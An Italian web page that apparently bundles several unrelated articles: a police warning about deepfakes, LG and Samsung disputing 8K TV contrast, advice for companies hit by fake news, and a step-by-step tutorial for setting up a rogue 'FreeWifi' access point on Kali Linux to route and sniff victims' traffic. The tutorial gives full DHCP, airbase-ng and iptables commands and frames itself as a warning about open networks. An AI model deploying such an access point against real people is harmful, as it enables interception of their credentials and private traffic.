Il deep fake, cioè la nuova tecnica che sfrutta l’intelligenza artificiale per sovrapporre il volto di una persona a un’altra ripresa in un video, “può essere usato per tanti scopi criminali gravissimi, nel mondo politico ma anche finanziario”. Lo ha detto Nunzia Ciardi, direttrice del Servizio Polizia postale e delle comunicazioni, intervenendo alla conferenza “La minaccia del deep fake” organizzata oggi a Roma da Videocittà.
Polizia Postale, il deep fake (sovrapporre il volto di una persona a un’altra ripresa in un video) si presta a crimini gravissimi
L’articolo Polizia Postale, il deep fake (sovrapporre il volto di una persona a un’altra ripresa in un video) si presta a crimini gravissimi proviene da .
I produttori di display ormai da tempo stanno già guardando oltre il 4K, TV con risoluzione 8K (33 megapixel) già esistono.
Tuttavia secondo LG i televisori di Samsung non dovrebbero essere classificati come 8K.
Samsung ovviamente non è d’accordo ma la cosa è quantomeno curiosa.
Il problema che solleva LG non riguarda la risoluzione: sia LG che Samsung usano una risoluzione di 7680×4320 per i televisori 8K di ciascuna azienda. Ciò che infastidisce LG è il valore della modulazione di contrasto (CM), che misura la capacità di distinguere una banda di linee bianche e nere alternate.
LG precisa ulteriormente: “La risoluzione è spesso confusa con il conteggio dei pixel orizzontali come 3840 pixel (4K) e 7680 pixel (8K). Quel che è certo è che se i pixel adiacenti non sono chiaramente distinguibili tra loro, il display progettato avrà una qualità di visualizzazione inferiore (ad esempio sfocatura dell’immagine o del testo) anche con un elevato numero di pixel”
LG si è appoggiata per la determinazione all’International Committee for Display Metrology (ICDM), un’organizzazione di settore che sviluppa standard di misurazione delle prestazioni di visualizzazione, essa afferma che i valori di CM dovrebbero essere del 50 % o superiori.
In futuro, i dati di CM svolgeranno un ruolo importante nel modo in cui vengono commercializzati i televisori 8K.
LG sottolinea che i test hanno evidenziato che le loro TV OLED 8K e TV NanoCell hanno un CM nella gamma del 90 %, che è ben al di sopra della soglia del 50 % fissata dall’ICDM.
In netto contrasto invece, LG ha recentemente dichiarato che i televisori Samsung hanno solo un livello CM orizzontale del 13%, come riportato da The Korea Herald (Sony invece arriva al 70 %).
Nam Ho-jun (LG): “Con l’intensificarsi della concorrenza nel settore televisivo, al fine di guidare il mercato 8K, riteniamo che sia importante non solo espandere il numero di modelli ma offrire qualcosa che soddisfi gli standard globali. Altrimenti, saranno i consumatori a essere messi in pericolo a causa dell’inganno di acquistare prodotti scadenti pensando che siano i migliori disponibili”
Sostanzialmente secondo LG, la Samsung utilizzerebbe una tecnologia 4K migliorando l’angolo di visione dello schermo.
In una conferenza stampa a sé stante, Samsung ha contrastato la dichiarazione di LG minimizzando l’importanza di CM.
Yong Seok-woo (Samsung): “Con la comparsa di display con nuove tecnologie, in particolare 8K, CM non rappresenta più la qualità complessiva dell’immagine. Dovrebbero essere considerati la luminosità, il volume del colore e altri fattori ottici quali le tecnologie di elaborazione”
Samsung ha fatto un ulteriore passo avanti posizionando i propri televisori 8K accanto ai televisori 8K di LG e confrontando la qualità delle immagini di un giornale con lettere minuscole. Il testo era più chiaro sui modelli Samsung.
Il dato di fatto è che non tutti i display creati sono uguali, ma i consumatori potrebbero dover determinare cosa costituisce la qualità 8K reale rispetto a quella 8K fake, a seconda di come si produce il tutto.
Cos’è un Access Point?
Un Access Point (AP) è un dispositivo che, collegato ad una LAN (Local Area Network), permette l’accesso alla rete stessa tramite wireless. Possiamo trovarne uno integrato in qualsiasi moderno router wireless. La maggior parte degli AP seguono gli standard di comunicazione 802.11 imposti dall’IEEE, che permettono loro il collegamento con una gran varietà di dispositivi come laptop, tablet o smartphone.
Emulare un Access Point
Possiamo ricreare un AP con il nostro PC al fine di indurre qualsiasi utente nel raggio d’azione della nostra scheda di rete a collegarsi ad internet attraverso di esso, facendo così passare tutti i dati in transito tra client connessi e server attraverso la nostra macchina. Questa tecnica viene chiamata Fake Access Point o ancora meglio Rogue Access Point (dall’inglese rogue = mascalzone, furfante, canaglia, disonesto).
Per questa guida avremo bisogno di:
- Una connessione internet
- Un PC Linux (personalmente utilizzo Kali Linux), dotato di scheda di rete
- Un adattatore wireless che supporti il monitor mode (per questo tutorial ho utilizzato ALFA AWUS036NH)
Installazione DHCP Server
Installiamo DHCP (Dynamic Host Configuration Protocol), un protocollo di rete a livello applicativo che permette l’assegnazione dinamica di indirizzi IP ai client connessi al nostro Rogue AP.
Per farlo digitiamo da terminale: apt-get install isc-dhcp-server
Una volta installato dovremo configurarlo secondo i parametri che desideriamo conferire all’Access Point. Apriamo con un editor testuale il file di configurazione del demone, situato nel percorso /etc/dhcp/dhcpd.conf e lo modifichiamo aggiungendo le seguenti righe:
# GOOGLE DNS SERVER option domain-name-servers 8.8.8.8, 8.8.4.4; default-lease-time 600; max-lease-time 7200; option T150 code 150 = string; deny client-updates; one-lease-per-client false; allow bootp; ddns-updates off; ddns-update-style none; authoritative; # ROGUE AP NETWORK CONFIGURATION subnet 192.168.2.0 netmask 255.255.255.0 { interface at0; range 192.168.2.2 192.168.2.254; option routers 192.168.2.1; option subnet-mask 255.255.255.0; option broadcast-address 192.168.2.255; option domain-name-servers 8.8.8.8; allow unknown-clients; }
Interfaccia in monitor mode
Supponiamo di avere due interfacce di rete, una cablata (eth0), collegata al router di casa tramite un cavo ethernet, e l’altra, un adattatore wireless (wlan0).
Mettiamo la seconda in monitor mode assicurando la connettività senza fili al punto di accesso.
ifconfig wlan0 down iwconfig wlan0 mode monitor ifconfig wlan0 up
Creazione dell’Access Point
Tramite il tool airbase-ng, incluso nella suite aircrack-ng, creiamo l’AP utilizzando un nome che possa invogliare un utente ad utilizzarlo.
airbase-ng -e "FreeWifi" -c 11 wlan0
Il comando dato in precedenza crea un bridge, un vero e proprio ponte identificato con at0, tra l’interfaccia di rete utilizzata per dare connettività wireless all’AP e quella connessa al router, quindi ad Internet. Impostiamo il bridge secondo i parametri definiti nel file di configurazione del demone DHCP.
ifconfig at0 up ifconfig at0 192.168.2.1 netmask 255.255.255.0
Aggiungiamo il gateway di default per l’AP appena creato alla tabella di routing della nostra macchina.
route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
Lanciamo il demone DHCP con il comando service isc-dhcp-server start
Configurazione del firewall
Utilizziamo iptables, il firewall integrato nel kernel Linux, per instradare i pacchetti provenienti dall’AP verso la scheda di rete connessa ad Internet. Iniziamo resettando iptables.
iptables -F iptables -t nat -F iptables --delete-chain iptables -t nat --delete-chain
Impostiamo le nuove regole.
iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
Abilitare IP Forwarding
Abilitiamo l’IP Forwarding lanciando il comando echo 1 > /proc/sys/net/ipv4/ip_forward
Risultato e conclusioni
L’Access Point con nome FreeWifi è attivo e funzionante! Se proviamo a collegarci ad esso tramite qualsiasi dispositivo, avremo pieno accesso ad Internet. Attraverso il nostro PC possiamo controllare tutto il traffico in transito tra i dispositivi connessi all’AP e la rete. Associato a strumenti per lo sniffing come Wireshark ed Ettercap, dà ad un attaccante il pieno controllo su pagine web visitate, dati vari e credenziali d’accesso a siti internet mettendo a rischio sicurezza e privacy dell’utente.
Dopo aver letto questo articolo, constatato quanto sia semplice cadere nella trappola, continuerete ad utilizzare le reti non protette?
Non è frequente, ma capita di incappare in fake news che possono danneggiare la reputazione aziendale. Raramente sono attacchi diretti. Più di frequente sono menzogne sulla loro area di business. Come difendersi? La disinformazione, purtroppo, corre veloce. Sovente più della verità. Cosa fare allora per contrastare questo fenomeno, quando tocca aree di nostro interesse? Cosa posso fare se la mia azienda o il mio settore di business è stata attaccato con delle fake news? Per prima cosa, soprattutto se è la vostra azienda o la vostra persona ad essere stata attaccata, ancora prima di fare una denuncia per diffamazione, chiedere che le notizie vengano rimosse, segnalandole sui social come false, e facendo fare la stessa segnalazione dai vostri collaboratori. Contemporaneamente, preparare e diffondere il più velocemente possibile un comunicato stampa per denunciare l’attacco, spiegare quale sia realmente la situazione e illustrare le azioni che sono state intraprese, o che si intende mettere in atto, per fermare l’attacco. Sporgere denuncia è ovviamente necessario, ma visto che purtroppo i tempi della giustizia in Italia sono lunghi, è determinante agire in maniera veloce, per fare in modo che la diffusione di notizie false su voi e il vostro mondo venga arginata con delle notizie vere. Così facendo, nel 90% dei casi, la verità soppianta le fake. Per essere efficaci serve un monitoraggio costante di ciò che viene pubblicato sui social, sul web e sui media in generale, in modo da poter agire istantaneamente. Quando si è al centro delle fake news ci si trova in uno scenario da vera e propria comunicazione di crisi: quindi, se la situazione è particolarmente grave, pensate anche a una conferenza stampa. Il vostro ufficio stampa, soprattutto se costituito da giornalisti, è una fonte autorevole per i media. Non solo, naturalmente, non li ha mai ingannati, ma è sempre stato disponibile a rispondere nei tempi giusti a tutte le richieste dei colleghi. E’ una fonte credibile per invitare i giornalisti a riflettere su quanto sta accadendo. Usatelo! Se non siete stati attaccati direttamente, ma stanno diffondendo notizie false sul vostro settore merceologico che possono creare problemi al vostro business, raccontate come stanno veramente le cose: una nota o un comunicato stampa da mandare a redazioni, agenzie di stampa, radio, tv e testate on line, e una serie di post per parlare sui social network. Qualsiasi canale è utile per diffondere la vostra voce. Mandate la vostra comunicazione a tutti. Non state zitti! Ne uscirete solo perdenti e vinceranno le fake news. Diventate voi, che siete sul campo ogni giorno, la fonte da sentire! Anche se percentualmente sembra poco rilevante, il fenomeno delle fake news in Italia non va sottovalutato. Secondo uno studio di Reuters Institute e Oxford Universityi più popolari siti di fakenes hanno un reach che va dal 3,1% all’1%. Percentuali contenute, se si pensa che repubblica.it e corriere.it raggiungono con le loro notizie più della metà degli internauti italiani, ma in grado di fare danni incalcolabili. Come si tengono aggiornati sulle notizie gli Italiani Per informarsi, dieci anni fa il 30% degli italiani (intervistati da Demos per il rapporto Italiani e Fake News) utilizzava, ogni giorno, i quotidiani cartacei. Il 25% consultava internet. Oggi il rapporto si è rovesciato e in misura molto marcata. Il 63% degli italiani si informa su internet, soprattutto attraverso lo smartphone, e di questo vero e proprio esercito il 58% è sempre connesso. Solo il 17% dichiara di informarsi attraverso i giornali “di carta”. Secondo il rapporto di Demos su Italiani e Fake news, per tenersi informati gli italiani utilizzano meno giornali e più web. Nel dettaglio, questa la classifica in percentuale di utilizzo quotidiano: tivù 84%, internet 63%, social network 45%, radio 40%, quotidiani cartacei 17%, settimanali 9%. https://www.mondoraro.org/archives/174294
L’articolo COME POSSONO TUTELARSI LE AZIENDE DALLE FAKE NEWS ? proviene da .